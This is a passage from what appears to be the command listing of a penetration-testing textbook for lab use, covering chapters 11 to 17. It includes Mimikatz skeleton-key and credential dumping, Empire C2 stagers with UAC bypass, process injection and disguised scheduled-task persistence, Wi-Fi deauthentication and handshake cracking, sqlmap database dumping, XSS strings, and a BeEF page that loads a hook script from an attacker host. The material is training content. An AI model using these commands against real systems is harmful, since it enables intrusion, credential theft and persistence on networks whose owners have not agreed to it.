mimikatz # misc::skeleton
mimikatz # !-
Command 11.33

mimikatz # misc::cmd
Command 11.34

C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> powershell
Command 11.35

PS C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> Enter-
PSSession -Computername dc1 -credential
redteamlab\Administrator
Command 11.36

[dc1]: PS C:\Users\Administrator\Documents>
Command 11.37

Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
 LLMNR/NBT-NS Poisoning and SMB Relay –
https://attack.mitre.org/techniques/T1557/001/

 OS Credential Dumping: LSA Secrets –


https://attack.mitre.org/techniques/T1003/004/

 Active Directory Security – https://adsecurity.org/


Chapter 12
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Empire: https://github.com/BC-SECURITY/Empire

 Starkiller: https://github.com/BC-SECURITY/Starkiller

 Windows Server 2019: https://www.microsoft.com/en-


us/evalcenter/evaluate-windows-server-2019

Images

Figure 12.1 – C2 operations


Figure 12.2 – Empire client-server model

Figure 12.3 – Empire deployment model

Figure 12.4 – Starting the Empire server


Figure 12.5 – Adding a new Empire server

Figure 12.6 – Connecting to a remote Empire server

Figure 12.7 – Empire client user interface


Figure 12.8 – Viewing user accounts

Figure 12.9 – Creating a user account

Figure 12.10 – Disabling a user account


Figure 12.11 – Creating a listener

Figure 12.12 – Viewing listeners

Figure 12.13 – Executing the agent code

Figure 12.14 – Agent creation


Figure 12.15 – Viewing agents

Figure 12.16 – help menu

Figure 12.17 – Collecting information on the target


Figure 12.18 – Checking the agent context

Figure 12.19 – Executing remote commands


Figure 12.20 – Executing Mimikatz

Figure 12.21 – Credentials table


Figure 12.22 – Viewing running processes

Figure 12.23 – Spawning a new agent

Figure 12.24 – Checking for a new agent


Figure 12.25 – Spawning an interactive shell

Figure 12.26 – Starkiller deployment model


Figure 12.27 – Starkiller log-on page
Figure 12.28 – Accessing the Users menu

Figure 12.29 – User accounts


Figure 12.30 – Changing the password

Figure 12.31 – Creating a new user


Figure 12.32 – Viewing modules

Figure 12.33 – Selecting a listener


Figure 12.34 – Creating a listener
Figure 12.35 – Selecting a stager

Figure 12.36 – Creating a stager


Figure 12.37 – Copying payload code

Figure 12.38 – Downloading a payload file

Figure 12.39 – Viewing agents


Figure 12.40 – Executing a module

Figure 12.41 – Viewing real-time module execution


Figure 12.42 – Viewing a list of tasks on the agent
Figure 12.43 – Displaying system information
Figure 12.44 – Navigating the filesystem

Figure 12.45 – Viewing collected credentials


Figure 12.46 – Reporting

Code and Commands


kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install -y powershell-empire
starkiller
Command 12.1

kali@kali:~$ sudo powershell-empire server


Command 12.2

kali@kali:~$ sudo mousepad /etc/powershell-


empire/client/config.yaml
Command 12.3
Empire-Server:
host: https://172.30.1.30
port: 1337
socketport: 5000
username: empireadmin
password: password123
Code 12.1

kali@kali:~$ sudo powershell-empire client


Command 12.4

(Empire) > connect -c Empire-Server


Command 12.5

(Empire) > admin


(Empire: admin) > user_list
Command 12.6

(Empire: admin) > create_user NewUser1 Password123


(Empire: admin) > user_list
Command 12.7

(Empire: admin) > disable_user 2


(Empire: admin) > user_list
Command 12.8

kali@kali:~$ sudo powershell-empire server


Command 12.9

kali@kali:~$ sudo powershell-empire client


Command 12.10
(Empire) > uselistener http
Command 12.11

(Empire: uselistener/http) > set Name DClistener


Command 12.12

(Empire: uselistener/http) > set Host 192.168.42.20


Command 12.13

(Empire: uselistener/http) > set Port 1335


Command 12.14

(Empire: uselistener/http) > options


Command 12.15

(Empire: uselistener/http) > execute


Command 12.16

(Empire) > listeners


Command 12.17

(Empire) > usestager multi/launcher


Command 12.18

(Empire: usestager/multi/launcher) > set Listener


DClistener
Command 12.19

(Empire: usestager/multi/launcher) > generate


Command 12.20

(Empire) > agents


Command 12.21
(Empire: agents) > interact 2N534EK6
(Empire: 2N534EK6) > help
Command 12.22

(Empire: 2N534EK6) > info


Command 12.23

(Empire: 2N534EK6) > display high_integrity


high_integrity is 1
Command 12.24

(Empire: 2N534EK6) > bypassuac DClistener


Command 12.25

(Empire: 2N534EK6) > shell ipconfig


Command 12.26

(Empire: 2N534EK6) > mimikatz


Command 12.27

(Empire: 2N534EK6) > credentials


Command 12.28

(Empire: credentials) > interact 2N534EK6


(Empire: 2N534EK6) > shell ps
Command 12.29

(Empire: 2N534EK6) > psinject DClistener 3140


Command 12.30
(Empire: agents) > interact 2N534EK6
(Empire: 2N534EK6) > shell
Command 12.31

(Empire) > uselistener http_malleable


Command 12.32

(Empire: uselistener/http_malleable) > set Profile


office365_calendar.profile
Command 12.33

(Empire: editlistener/http_malleable) > set Host


192.168.40.20
(Empire: uselistener/http_malleable) > set Port 443
Command 12.34

(Empire: uselistener/http_malleable) > set Name


ThreatEmulation
(Empire: uselistener/http_malleable) > execute
Command 12.35

(Empire: uselistener/http_malleable) > main


(Empire) > listeners
Command 12.36

(Empire: listeners) > usestager multi/launcher


(Empire: usestager/multi/launcher) > set Listener
ThreatEmulation
Command 12.37

(Empire: usestager/multi/launcher) > generate


Command 12.38
(Empire: agents) > interact UY2F8P1T
(Empire: UY2F8P1T) > usemodule
powershell/persistence/elevated/schtasks
Command 12.39

(Empire:
usemodule/powershell/persistence/elevated/schtasks) > set
OnLogon True
Command 12.40

(Empire:
usemodule/powershell/persistence/elevated/schtasks) > set
Listener ThreatEmulation
(Empire:
usemodule/powershell/persistence/elevated/schtasks) >
execute
Command 12.41

SUCCESS: The scheduled task "Updater" has successfully been


created.
Schtasks persistence established using listener
ThreatEmulation stored in
HKLM:\Software\Microsoft\Network\debug with Updater OnLogon
trigger.
Command 12.42

kali@kali:~$ sudo powershell-empire server


Command 12.43

kali@kali:~$ sudo starkiller


Command 12.44
Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
 Overview of Empire 4: https://www.bc-security.org/post/overview-of-empire-
4-0-and-c/

 Empire wiki: https://bc-security.gitbook.io/empire-wiki/

 Empire: Malleable C2 Profiles: https://www.bc-security.org/post/empire-


malleable-c2-profiles/
Chapter 13
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Windows 10 Enterprise: https://www.microsoft.com/en-


us/evalcenter/evaluate-windows-10-enterprise

 FreeRADIUS: https://freeradius.org/

 airgeddon: https://github.com/v1s1t0r1sh3r3/airgeddon

 An Alfa AWUS036NHA High Gain Wireless B/G/N USB adapter

 AN Alfa AWUS036ACH Long-Range Dual-Band AC1200 Wireless USB 3.0 Wi-Fi


adapter

 A physical wireless router that supports WEP, WPA2-Personal, WPA2-Enterprise,


and WPA3 security standards

Images
Figure 13.1 – Wireless standards

Figure 13.2 – Non-overlapping wireless channels

Figure 13.3 – Frequency comparison table

Figure 13.4 – SISO

Figure 13.5 – MIMO


Figure 13.6 – SU-MIMO

Figure 13.7 – MU-MIMO


Figure 13.8 – Checking for wireless network adapters

Figure 13.9 – Enabling monitoring mode

Figure 13.10 – Verifying monitor mode


Figure 13.11 – Monitoring wireless networks

Figure 13.12 – Capturing probes from wireless clients

Figure 13.13 – Filtering networks


Figure 13.14 – Filtering a specific wireless network

Figure 13.15 – Scanning for target wireless networks

Figure 13.16 – De-authentication attack


Figure 13.17 – Observing associated clients

Figure 13.18 – Wireless router configurations

Figure 13.19 – Checking the wireless network adapter's status


Figure 13.20 – Enabling monitor mode

Figure 13.21 – Checking the interface's status

Figure 13.22 – Searching for the target network

Figure 13.23 – Capturing the WPA/WPA2 handshake


Figure 13.24 – Cracking the WPA/WPA2 network

Figure 13.25 – Capturing probes

Figure 13.26 – Checking the wireless adapter's status


Figure 13.27 – Enabling monitor mode

Figure 13.28 – Hostapd configuration file

Figure 13.29 – Starting the honeypot


Figure 13.30 – Capturing the WPA handshake

Figure 13.31 – aircrack-ng password cracking


Figure 13.32 – Enterprise wireless lab

Figure 13.33 – Checking optional tools


Figure 13.34 – Selecting a wireless network adapter

Figure 13.35 – Enabling monitor mode

Figure 13.36 – Accessing Enterprise attacks menu


Figure 13.37 – Creating custom digital certificates

Figure 13.38 – Certificate options


Figure 13.39 – Explore for targets

Figure 13.40 – Discovering targets

Figure 13.41 – Selecting a target network


Figure 13.42 – The Enterprise Evil Twin menu

Figure 13.43 – Selecting Deauth aireplay attack


Figure 13.44 – Launching the attack

Figure 13.45 – User hash captured

Figure 13.46 – Enterprise attacks menu


Figure 13.47 – Accessing the decryption menu

Figure 13.48 – Accessing the Enterprise decryption menu

Figure 13.49 – Choosing the decryption type


Figure 13.50 – Interactive options

Figure 13.51 – Password retrieved

Figure 13.52 – Selecting a wireless network adapter

Figure 13.53 – Enabling monitor mode


Figure 13.54 – Accessing Evil Twin attacks menu

Figure 13.55 – Explore for targets


Figure 13.56 – Nearby wireless networks

Figure 13.57 – Choosing a target

Figure 13.58 – Choosing an attack type


Figure 13.59 – Selecting Deauth aireplay attack

Figure 13.60 – Selecting an internet interface


Figure 13.61 – Honeypot in effect

Figure 13.62 – Checking the wireless network adapter's status

Figure 13.63 – Enabling monitor mode


Figure 13.64 – Checking the interface's status

Figure 13.65 – Discovering the target network

Figure 13.66 – Deauthentication attack

Figure 13.67 – Capturing the WPA handshake


Figure 13.68 – Password cracking

Figure 13.69 – Researching security vulnerabilities


Figure 13.70 – Password generator

Code and Comments


kali@kali:~$ sudo airmon-ng check kill
kali@kali:~$ sudo airmon-ng start wlan0
Command 13.1

kali@kali:~$ sudo airodump-ng wlan0mon


Command 13.2

kali@kali:~$ sudo airodump-ng -c 6 wlan0mon


Command 13.3

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi


wlan0mon
Command 13.4

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi


wlan0mon
Command 13.5
kali@kali:~$ sudo aireplay-ng -0 100 -e Corp_Wi-Fi wlan0mon
Command 13.6

kali@kali:~$ sudo airmon-ng check kill


Command 13.7

kali@kali:~$ sudo airmon-ng start wlan0


Command 13.8

kali@kali:~$ sudo airodump-ng wlan0mon


Command 13.9

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi


wlan0mon -w Corp_Wi-Fi
Command 13.10

kali@kali:~$ sudo aireplay-ng -0 100 -a 68:7F:74:01:28:E1


wlan0mon
Command 13.11

kali@kali:~$ aircrack-ng Corp_Wi-Fi-01.cap -w


/usr/share/wordlists/rockyou.txt
Command 13.12

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install hostapd
Command 13.13

kali@kali:~$ sudo airmon-ng check kill


kali@kali:~$ sudo airmon-ng start wlan1
Command 13.14

kali@kali:~$ mousepad wpa2-attack.conf


Command 13.15
interface=wlan0
driver=nl80211
ssid=Corp_Wi-Fi
wpa=2
wpa_passphrase=fakepassword
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
channel=6
Code 13.1

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi


wlan1mon -w APLessAttack
Command 13.16

kali@kali:~$ sudo hostapd wpa2-attack.conf


Command 13.17

kali@kali:~$ aircrack-ng APLessAttack-01.cap -w


/usr/share/wordlists/rockyou.txt
Command 13.18

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install airgeddon
Command 13.19

kali@kali:~$ sudo airgeddon


Command 13.20
kali@kali:~$ sudo apt install bettercap
kali@kali:~$ sudo apt install dnsmasq
kali@kali:~$ sudo apt install hostapd-wpe
kali@kali:~$ sudo apt install isc-dhcp-server
kali@kali:~$ sudo apt install asleap
kali@kali:~$ sudo apt install hostapd
kali@kali:~$ sudo apt install mdk4
kali@kali:~$ sudo apt install hcxdumptool
kali@kali:~$ sudo apt install hcxtools
kali@kali:~$ sudo apt install beef-xss
kali@kali:~$ sudo apt install lighttpd
Command 13.21

kali@kali:~$ sudo airgeddon


Command 13.22

/home/kali/enterprise-Corp_Wi-Fi/
Command 13.23

/home/kali/enterprise-Corp_Wi-
Fi/enterprise_captured_john_<BSSID_value>_hashes.txt
Command 13.24

/usr/share/wordlists/rockyou.txt
Command 13.25

kali@kali:~$ sudo airgeddon


Command 13.26
kali@kali:~$ sudo airmon-ng check kill
Command 13.27

kali@kali:~$ sudo airmon-ng start wlan0


Command 13.28

kali@kali:~$ sudo airodump-ng wlan0mon


Command 13.29

kali@kali:~$ sudo airodump-ng -c 8 --essid WPA3_Corp_Wi-Fi


wlan0mon -w WPA3_downgrade
Command 13.30

kali@kali:~$ sudo aireplay-ng -0 100 -a 92:83:C4:0C:5B:88


wlan0mon
Command 13.31

kali@kali:~$ aircrack-ng WPA3_downgrade-01.cap -w


/usr/share/wordlists/rockyou.txt
Command 13.32

Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
 Guidelines for Securing Wireless Local Area Networks (WLANs):
https://csrc.nist.gov/publications/detail/sp/800-153/final

 Key Reinstallation Attacks: https://www.krackattacks.com/


Chapter 14
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following software requirement:
 Kali Linux 2021.2 – https://www.kali.org/get-kali/

Images

Figure 14.1 – SET menu

Figure 14.2 – Accessing the Website Attacks menu


Figure 14.3 – Accessing the Credential Harvester Attack Method menu

Figure 14.4 – Using Site Cloner

Figure 14.5 – Setting up the attack


Figure 14.6 – Displaying the phishing website

Figure 14.7 – Capturing user credentials


Figure 14.8 – Redirection to the legitimate website

Figure 14.9 – Accessing the Infectious Media Generator menu


Figure 14.10 – Selecting an executable type

Figure 14.11 – Configuring the payload

Figure 14.12 – Reverse shell

Figure 14.13 – Viewing active shells


Figure 14.14 – Interacting with a shell

Code and Commands


kali@kali:~$ sudo setoolkit
Command 14.1

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
 Social Engineering – https://www.imperva.com/learn/application-
security/social-engineering-attack/

 Avoiding Social Engineering and Phishing Attacks – https://us-


cert.cisa.gov/ncas/tips/ST04-014
Chapter 15
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2 – https://www.kali.org/get-kali/

 Burp Suite – https://portswigger.net/burp

 OWASP Juice Shop – https://owasp.org/www-project-juice-shop/

Images

Figure 15.1 – Web application

Figure 15.2 – HTTP header


Figure 15.3 – HTTP response header

Figure 15.4 – Burp Suite intercepting request messages

Figure 15.5 – FoxyProxy


Figure 15.6 – Installing FoxyProxy

Figure 15.7 – Accessing the menu of FoxyProxy


Figure 15.8 – Configuring a proxy

Figure 15.9 – Switching proxies


Figure 15.10 – Opening Burp Suite

Figure 15.11 – Configuring the Intercept Client Requests options


Figure 15.12 – Configuring the Intercept Server Responses options

Figure 15.13 – Proxy Intercept tab

Figure 15.14 – Defining the scope


Figure 15.15 – Filter options

Figure 15.16 – Passive crawling


Figure 15.17 – Capturing a web request

Figure 15.18 – Sending to Repeater


Figure 15.19 – Working with Repeater

Figure 15.20 – Score Board


Figure 15.21 – Web server deployment

Figure 15.22 – Filtering challenges


Figure 15.23 – Capturing the HTTP POST message

Figure 15.24 – Forwarding the HTTP POST message


Figure 15.25 – Creating a SQL error

Figure 15.26 – Checking for SQL errors


Figure 15.27 – SQL injection

Figure 15.28 – Intercepting the HTTP POST message


Figure 15.29 – Response from the web application
Figure 15.30 – Gaining access

Figure 15.31 – Capturing a request message


Figure 15.32 – Modifying headers

Figure 15.33 – HTTP status update


Figure 15.34 – Administration section

Figure 15.35 – Discovering hidden directories


Figure 15.36 – Checking the sensitive directory

Figure 15.37 – Accessing confidential files


Figure 15.38 – Looking for sensitive files

Figure 15.39 – Viewing data

Figure 15.40 – Decoding Base64


Figure 15.41 – ROT13 decryption

Figure 15.42 – Completing the challenge


Figure 15.43 – Capturing an HTTP request

Figure 15.44 – Modifying an HTTP request message


Figure 15.45 – Abusing security misconfigurations

Code and Commands


kali@kali:~$ sudo docker run --rm -p 3000:3000
bkimminich/juice-shop
Command 15.1

GET /administration/ HTTP/1.1


Code 15.1

kali@kali:~$ dirb http://localhost:3000


/usr/share/wordlists/dirb/big.txt -r -N 403
Command 15.2
http://localhost:3000/ftp/eastere.gg%2500.md
Code 15.2

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install hurl
kali@kali:~$ hURL --help
Command 15.3

kali@kali:~$ hURL -8
"/gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/r
nfgre/rtt"
Command 15.4

http://localhost:3000/the/devs/are/so/funny/they/hid/an/eas
ter/egg/within/the/easter/egg
Code 15.3

GET /rest/fakepath HTTP/1.1


Code 15.4

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
 OWASP Top 10 – https://owasp.org/www-project-top-ten/

 OWASP Top 10 as a standard –


https://owasp.org/Top10/A00_2021_How_to_use_the_OWASP_Top_10_
as_a_standard/

 AppSec Program with the OWASP Top 10 –


https://owasp.org/Top10/A00_2021-
How_to_start_an_AppSec_program_with_the_OWASP_Top_10/
Chapter 16
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Windows 10 Enterprise: https://www.microsoft.com/en-


us/evalcenter/evaluate-windows-10-enterprise

 Burp Suite: https://portswigger.net/burp

 OWASP Broken Web Applications:


https://sourceforge.net/projects/owaspbwa/files/

 OWASP Juice Shop: https://owasp.org/www-project-juice-shop/

Images

Figure 16.1 – Insecure directory


Figure 16.2 – Error opening the file

Figure 16.3 – Viewing the packages


Figure 16.4 – Researching the epilogue-js package

Figure 16.5 – Submitting feedback


Figure 16.6 – Resetting password
Figure 16.7 – Revealing the security question
Figure 16.8 – Sending traffic
Figure 16.9 – HTTP POST message

Figure 16.10 – Inserting a new position


Figure 16.11 – Setting the payload

Figure 16.12 – Identifying the correct name


Figure 16.13 – OWASP BWA banner

Figure 16.14 – OWASP BWA home page


Figure 16.15 – Selecting a bug

Figure 16.16 – Generating HTTP traffic

Figure 16.17 – HTTP GET message


Figure 16.18 – Modifying the HTTP request

Figure 16.19 – Bypassing the security controls


Figure 16.20 – OWASP BWA banner

Figure 16.21 – OWASP BWA home page


Figure 16.22 – Selecting a vulnerable application

Figure 16.23 – Selecting a vulnerability type


Figure 16.24 – Checking for SQL injection

Figure 16.25 – HTTP GET request


Figure 16.26 – Detecting vulnerabilities

Figure 16.27 – Discovering databases

Figure 16.28 – Retrieving tables


Figure 16.29 – Columns of the users table

Figure 16.30 – Columns retrieved from a table

Figure 16.31 – Retrieving columns only


Figure 16.32 – Password cracking process

Figure 16.33 – Extracted data

Figure 16.34 – An XSS attack


Figure 16.35 – CSRF attack

Figure 16.36 – OWASP BWA banner


Figure 16.37 – OWASP BWA home page

Figure 16.38 – Selecting a bug


Figure 16.39 – Generating a HTTP request

Figure 16.40 – Testing reflected XSS


Figure 16.41 – Reflected XSS working

Figure 16.42 – Selecting a bug


Figure 16.43 – Storing data on a web application

Figure 16.44 – Performing stored XSS


Figure 16.45 – Invisible entry

Figure 16.46 – Opening BeEF


Figure 16.47 – BeEF service

Figure 16.48 – BeEF login page


Figure 16.49 – Custom web page

Figure 16.50 – Loading the malicious web page


Figure 16.51 – Hooked web browser

Figure 16.52 – Sending a social engineering attack


Figure 16.53 – Pop-up window on the victim's browser

Code and Commands


GET /bWAPP/rlfi.php?language=file:///etc/passwd&action=go
HTTP/1.1
Code 16.1

sudo sqlmap --url <URL> --cookie= <'cookie token'> -dbs


Command 16.1
kali@kali:~$ sudo sqlmap --url
http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' -dbs
Command 16.2

kali@kali:~$ sudo sqlmap --url


http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --tables –D dvwa
Command 16.3

kali@kali:~$ sudo sqlmap --url


http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --columns -D dvwa
Command 16.4

kali@kali:~$ sudo sqlmap --url


http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --columns -D dvwa -T
users
Command 16.5

kali@kali:~$ sudo sqlmap --url


http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=
Submit# --cookie='security=low;
PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --dump -D dvwa -T
users
Command 16.6

<script>alert("Testing Reflected XSS")


Code 16.2
</script>
Command 16.7

<script>alert("Testing Stored XSS")</script>


Code 16.3

kali@kali:~$ service apache2 start


Command 16.8

kali@kali:~$ sudo mousepad /var/www/html/index.html


Command 16.9

<html>
<head>
<title>Web Page</title>
<script src="http://<IP>:3000/hook.js"></script>
</head>
<body>
<h1>This is a vulnerable web page</h1>
<p>We are using browser exploitation.</p>
</body>
</html>
Code 16.4

Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
 OWASP Top 10: https://owasp.org/www-project-top-ten/
 OWASP Top 10 as a standard:
https://owasp.org/Top10/A00_2021_How_to_use_the_OWASP_Top_10_
as_a_standard/

 AppSec Program with the OWASP Top 10:


https://owasp.org/Top10/A00_2021-
How_to_start_an_AppSec_program_with_the_OWASP_Top_10/
Chapter 17
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

Images

Figure 17.1 – WiFi Pineapple Nano


Figure 17.2 – ESP8266 microcontroller

Figure 17.3 – Bash Bunny

Figure 17.4 – Packet Squirrel


Figure 17.5 – LAN Turtle

Figure 17.6 – USB-powered network switch


Figure 17.7 – Retractable cable

Figure 17.8 – ZeroTier network connectivity


Figure 17.9 – Creating a network

Figure 17.10 – Joining a network

Figure 17.11 – Member


Figure 17.12 – Allowing a member

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
 Rules of engagement: https://hub.packtpub.com/penetration-testing-rules-
of-engagement/

 Penetration testing methodologies:


https://wiki.owasp.org/index.php/Penetration_testing_methodologies

 OWASP Testing Checklist: https://github.com/tanprathan/OWASP-Testing-


Checklist

 CyberChef: https://gchq.github.io/CyberChef/

 PayloadsAllTheThings:
https://github.com/swisskyrepo/PayloadsAllTheThings

You might also like